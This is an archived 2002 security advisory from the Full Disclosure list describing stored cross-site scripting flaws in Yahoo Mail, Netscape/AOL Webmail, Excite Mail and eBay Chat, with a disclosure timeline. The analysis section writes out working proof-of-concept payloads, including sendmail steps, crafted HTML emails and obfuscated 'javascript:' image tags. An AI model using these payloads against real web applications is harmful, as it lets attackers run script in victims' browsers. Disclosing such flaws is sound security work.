Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications

From: full-disclosure () lists netsys com (David Endler)
Date: Mon, 19 Aug 2002 08:39:49 -0400
iDEFENSE Security Advisory 08.19.2002 
Cross-Site Scripting (XSS) Vulnerabilities in Popular Web 
Applications

Yahoo Mail      http://mail.yahoo.com
Netscape Mail   http://webmail.netscape.com
AOL Webmail     http://webmail.aol.com (same as Netscape Mail)
Excite Mail     http://mail.excite.com
eBay Chat       http://pages.ebay.com/community/chat/index.html


DESCRIPTION 

Many Web Applications generate dynamic HTML web pages using 
user-submitted data and other sources of "untrusted content." 
Web Applications not meticulously filtering this untrusted 
content before presenting the web page to the user may 
allow for the manipulation of the web page and its content 
interpretation by a web browser.

This issue becomes dangerous when untrusted content is able to 
be inserted into a dynamic HTML web page via a web application 
or other means, causing the content to execute potentially 
malicious code within a users browser with the exact same 
privileges of the ligitimate web server.

Some Web Applications such as Yahoo Mail and others, already 
meticulously filter incoming untrusted data before the content 
reaches their users. However, given the loose interpretation 
of HTML/JavaScript/VBScript etc. by various web browsers, 
obfuscated content may elude the current filters and execute 
within the users browser environment.

Allowing the attacker to target users almost instantly without 
relying on the user performing any activities other than 
normal usage. All vulnerabilties affect either Microsoft 
Internet Explorer Browser or Netscape or both. These types of 
XSS vulnerabilities are usually classified as "constant-
state", as they exist persistently for more than just one HTTP 
request.  More detailed XSS exploitation scenarios 
are detailed in an iDEFENSE paper available at 
http://www.idefense.com/XSS.html.


ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x 
browsers (see Vendor 
Response, this issue in Yahoo has since been addressed):

bash$ sendmail -t target () yahoo com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker () foo com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------



*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail 
(webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The 
following XSS behavior can be caused in both IE 5.x/6.x and 
Netscape 4.x:

bash$ sendmail -t target () netscape net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker () foo com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------



*** Excite Webmail ***

It would seem that Excite does not perform any filtering of 
HTML/SCRIPT whatsoever.  The following XSS behavior can be 
caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target () excite com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker () foo com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------



*** eBay Chat ***

While you are logged in as an eBay user, place the text sting 
below within the chat text field and click submit. The message 
will appear within the main chat text message and will execute 
in a user's browser when read. The following XSS behavior can 
be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------



DISCOVERY CREDIT

Jeremiah Grossman (jeremiah () whitehatsec com)
Lex Arquette (lex () whitehatsec com)


VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr () yahoo-inc com), title 
"Paranoid Yahoo", responded and issue was fixed.


DISCLOSURE TIMELINE

June 27, 2002           Exclusively Disclosed to iDEFENSE
July 16, 2002           Ebay, AOL/Netscape, Yahoo, and Excite notified
July 16, 2002           iDEFENSE Client Disclosure
August 11, 2002         Second notice given to Excite, 
AOL/Netscape, and eBay 
through web customer service suggestion systems
August 19, 2002         Still no response from Excite, 
AOL/Netscape, or eBay - Public Disclosure




http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler () idefense com
www.idefense.com
Previous By Date Next
Previous By Thread Next

Current thread: